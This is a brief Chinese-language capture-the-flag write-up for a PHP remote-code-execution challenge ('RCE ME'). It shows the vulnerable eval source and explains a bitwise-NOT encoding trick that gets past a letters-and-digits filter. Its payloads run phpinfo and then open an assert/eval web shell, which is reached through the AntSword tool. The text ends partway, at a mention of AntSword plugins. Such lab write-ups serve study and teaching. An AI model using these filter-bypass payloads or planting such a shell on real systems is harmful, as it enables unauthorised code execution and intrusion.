[极客大挑战 2019]RCE ME

 <?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

对长度进行了限制，而且不能有数字和字母

使用取反

%8F%97%8F%96%91%99%90

?code=(~%8F%97%8F%96%91%99%90)();

能看到禁用的函数

构造payload

<?php 

$a='assert';
echo urlencode(~$a);
echo '222222';
$b='(eval($_POST[a]))';
echo urlencode(~$b);

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);

使用蚁剑连接

可以连接，但是读不到flag

利用蚁剑的插件